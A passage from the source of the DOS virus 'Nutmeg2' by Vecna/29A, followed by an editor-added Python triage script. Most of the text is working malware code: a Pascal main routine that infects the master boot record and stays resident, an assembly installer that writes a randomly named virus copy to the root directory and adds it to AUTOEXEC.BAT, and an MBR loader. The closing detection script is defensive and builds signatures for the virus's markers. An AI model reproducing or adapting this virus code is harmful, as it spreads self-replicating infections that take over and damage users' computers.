    DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
    DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
    DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
    DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
    DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
    DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
    DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
    DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
    DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
    DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
    DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
    DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
    DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
    DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
    DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
    DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
    DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
    DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
    DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
    DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
    DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
    DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
    DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
    DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
    DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
    DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
    DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
    DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
    DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
    DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
    DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
    DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
    DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
    DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
    DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
    DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
    DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
    DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
    DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
    DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
    DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
  @OVERBUFFER:
    POP DS
  END;
END;

BEGIN
  INITALL;
  INFECTMBR;
  SPAWNHOST;
  IF NOT(RESIDENT) THEN
  BEGIN
    MEML[$0:$350]:=$20FF20FF;
    SETINTVEC($28,@VIRUSINT28);
    KEEP(0);
  END;
END.

;(Cut here)-------------------------------------------------------------------
;[Nutmeg2] virus by Vecna/29A
;Installer
;
;These routines add a randomly named virus sample to AUTOEXEC.BAT and
;write this virus sample to the root dir.
;To do this, it hooks interrupt 0x1C, waits for DOS to load and then hooks
;interrupt 0x21. That hook waits for a file execute, then reads the virus code
;and writes it to the disk as a file, and then modifies AUTOEXEC.BAT to execute
;this file. All interrupt hooks are restored after use, and only 1 kilobyte is
;subtracted from memory. The virus sample is executed with a "!" as its single
;parameter. This is done to tell the virus to disinfect AUTOEXEC.BAT.

.MODEL TPASCAL
.386P
.CODE
ORG 0

PUBLIC LOADER

LOADER:
        MOV DI, OFFSET MUTATE-OFFSET LOADER
        MOV CX, 8
NCHAR:
        IN AL, 40H
        AND AL, 01111B
        ADD AL, 'A'
        DB 2EH
        STOSB
        LOOP NCHAR
        PUSH 0
        POP DS
        MOV AX, OFFSET INT1C-OFFSET LOADER
        MOV SI, 1CH*4
        MOV DI, OFFSET OLD1C-OFFSET LOADER
        CLD
        CLI
        XCHG AX, WORD PTR DS:[SI]
        DB 2EH
        STOSW
        MOV AX, CS
        XCHG AX, WORD PTR DS:[SI+2]
        DB 2EH
        STOSW
        STI
        XOR EAX, EAX
        MOV DWORD PTR DS:[21H*4], EAX
        MOV ES, AX
        MOV BX, 7C00H
        MOV AX, 201H
        MOV CX, 2
        MOV DX, 80H
        INT 13H
        DB 0EAH
        DW 7C00H
        DW 0

INT1C:
        PUSH DS
        PUSHAD
        PUSH 0
        POP DS
        MOV CX, WORD PTR DS:[21H*4+2]
        CMP CX, 800H
        JA NOT_YET
        JCXZ NOT_YET
        MOV ESI, 21H*4
        MOV EDI, 0FFH*4
        MOV EAX, DWORD PTR DS:[ESI]
        MOV DWORD PTR DS:[EDI], EAX
        MOV AX, CS
        ROL EAX, 16
        MOV AX, OFFSET INT21-OFFSET LOADER
        MOV DWORD PTR DS:[ESI], EAX
        MOV EAX, DWORD PTR CS:[OLD1C-OFFSET LOADER]
        MOV DWORD PTR DS:[1CH*4], EAX
NOT_YET:
        POPAD
        POP DS
        DB 0EAH
OLD1C   DD 0

INT21:
        PUSH DS
        PUSH ES
        PUSHAD
ALL_PUSHED:
        PUSH 0
        POP DS
        CMP AX, 4B00H
        JNE NO_4B00
EXECUTING:
        MOV EAX, DWORD PTR DS:[0FFH*4]
        MOV DWORD PTR DS:[21H*4], EAX
        MOV AX, CS
        SUB AX, 1000H
        MOV ES, AX
        MOV AX, 200H+(4096/512)
        XOR BX, BX
        MOV CX, 5
        MOV DX, 80H
        INT 13H
        JC ERROR
        MOV AH, 3CH
        MOV CX, 10B
        PUSH CS
        POP DS
        MOV DX, OFFSET FNAME-OFFSET LOADER
        INT 21H
        JC ERROR
        XCHG AX, BX
        PUSH ES
        POP DS
        XOR DX, DX
        MOV AH, 40H
        MOV CX, 4096
        INT 21H
        JC ERROR
        PUSH CS
        POP DS
        MOV AH, 3EH
        INT 21H
        MOV AX, 3D02H
        MOV DX, OFFSET FNAME2-OFFSET LOADER
        INT 21H
        JC ERROR
        XCHG AX, BX
        MOV AX, 4202H
        XOR CX, CX
        CWD
        INT 21H
        MOV AH, 40H
        MOV CX, FSIZE-1
        MOV DX, OFFSET FNAME-OFFSET LOADER
        INT 21H
        JC ERROR
        MOV AH, 40H
        MOV CX, FSIZE2
        MOV DX, OFFSET PARAMS-OFFSET LOADER
        INT 21H
        JC ERROR
ERROR:
        MOV AH, 3EH
        INT 21H
NO_4B00:
        POPAD
        POP ES
        POP DS
        INT 0FFH
        RETF 2

FNAME   DB "C:\"
MUTATE  DB 8 DUP (0)
        DB ".EXE", 0
FSIZE   EQU $-OFFSET FNAME
PARAMS  DB " !", 13, 10
FSIZE2  EQU $-OFFSET PARAMS
FNAME2  DB 'AUTOEXEC.BAT', 0

END LOADER

;(Cut here)-------------------------------------------------------------------
;[Nutmeg2] virus by Vecna/29A
;MBR loader
;
;This piece of code resides in the MBR of an infected system. It just creates
;a stack, steals one kilobyte from 0x0:0x413, and reads and jumps to the
;installer in this hole.

.MODEL TPASCAL
.CODE
ORG 0

PUBLIC MLOADER

MLOADER:
        JMP SKIPMSG
        DB "[NUTMEG2] by Vecna/29A"
SKIPMSG:
        CLI
        XOR BX, BX
        MOV SS, BX
        MOV SP, 7C00H
        STI
        PUSH BX
        POP DS
        DEC WORD PTR DS:[413H]
        INT 12H
        MOV CL, 6
        SHL AX, CL
        PUSH AX
        POP ES
        MOV AX, 202H
        MOV CX, 3
        MOV DX, 80H
        INT 13H
        JC $
        PUSH ES
        PUSH BX
        RETF
        DB 'This virus was written in Brasil, in 1998'

END MLOADER
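The header comment describes a 4096-byte prepender, the installer comment describes the line it appends to AUTOEXEC.BAT, and the MBR loader carries two literal strings in the boot sector. The triage script below is an added example written by the editor; it is not part of Vecna's source. It checks those three artifacts against constructed sample data: the 4096-byte size and the two marker strings come from the page, the 'A'..'P' letter range is derived from the installer's AND AL,01111B / ADD AL,'A' loop, and the minimal MZ header builder and every sample input are constructed for the demonstration.

```python
"""Triage checks for the Nutmeg2 artifacts described in the comments above.

Added example (editor's code, not Vecna's). It runs on constructed sample
data embedded below; feed the functions real file contents to use it for triage.
"""
import re
import struct

VIRSIZE = 4096  # bytes the prepender adds, per the header comment
MZ = b"MZ"

# Strings the MBR loader (MLOADER) leaves in the boot sector.
MBR_MARKERS = (b"[NUTMEG2] by Vecna/29A",
               b"This virus was written in Brasil, in 1998")

# Line the installer (LOADER) appends to AUTOEXEC.BAT: "C:\" + 8 letters + ".EXE !".
# Its letter loop does AND AL,01111B / ADD AL,'A', so only 'A'..'P' can appear.
AUTOEXEC_LINE = re.compile(rb"^C:\\[A-P]{8}\.EXE !$")


def mz_image_size(data):
    """Size in bytes that a DOS MZ header declares for its image, or None if not MZ."""
    if len(data) < 6 or data[:2] != MZ:
        return None
    cblp, cp = struct.unpack_from("<HH", data, 2)  # bytes in last page, page count
    if cp == 0:
        return None
    return (cp - 1) * 512 + cblp if cblp else cp * 512


def looks_prepended(data, virsize=VIRSIZE):
    """Prepender heuristic: a leading MZ image of exactly virsize bytes, then a second MZ header."""
    if mz_image_size(data) != virsize or len(data) < virsize + 2:
        return False
    return data[virsize:virsize + 2] == MZ


def mbr_markers_found(sector):
    """Return the marker strings present in a 512-byte boot sector image."""
    return [m.decode() for m in MBR_MARKERS if m in sector]


def suspicious_autoexec_lines(text):
    """Lines of an AUTOEXEC.BAT (bytes) that match the installer's appended command."""
    return [ln.decode() for ln in text.splitlines() if AUTOEXEC_LINE.match(ln)]


# --- constructed samples (not real infected data) -----------------------------

def build_mz(total_size, body=b""):
    """Constructed stand-in: a minimal MZ header whose size fields declare total_size bytes."""
    cp, cblp = divmod(total_size, 512)
    if cblp:
        cp += 1
    header = struct.pack("<2sHH", MZ, cblp, cp)
    return (header + body).ljust(total_size, b"\0")


SAMPLE_HOST = build_mz(1000, b"host program body")
SAMPLE_INFECTED = build_mz(VIRSIZE, b"constructed stand-in for the virus body") + SAMPLE_HOST
SAMPLE_MBR = (b"\xeb\x16" + MBR_MARKERS[0] + b"\0" * 400 + MBR_MARKERS[1]).ljust(510, b"\0") + b"\x55\xaa"
SAMPLE_AUTOEXEC = b"@ECHO OFF\r\nPATH C:\\DOS\r\nC:\\DOS\\MOUSE.EXE\r\nC:\\KDHAOPLC.EXE !\r\n"


def triage():
    """Run all three checks over the constructed samples."""
    return {
        "infected_exe_flagged": looks_prepended(SAMPLE_INFECTED),
        "clean_exe_flagged": looks_prepended(SAMPLE_HOST),
        "mbr_markers": mbr_markers_found(SAMPLE_MBR),
        "autoexec_lines": suspicious_autoexec_lines(SAMPLE_AUTOEXEC),
    }


if __name__ == "__main__":
    for name, result in triage().items():
        print(f"{name}: {result}")
```

The prepender check is a heuristic: any EXE whose first MZ image is declared as exactly 4096 bytes and is followed by a second MZ header will trigger it, so treat a hit as a reason to pull the file for closer inspection rather than as proof. The marker and AUTOEXEC.BAT checks are exact-match signatures for the strings and command format visible in the source above.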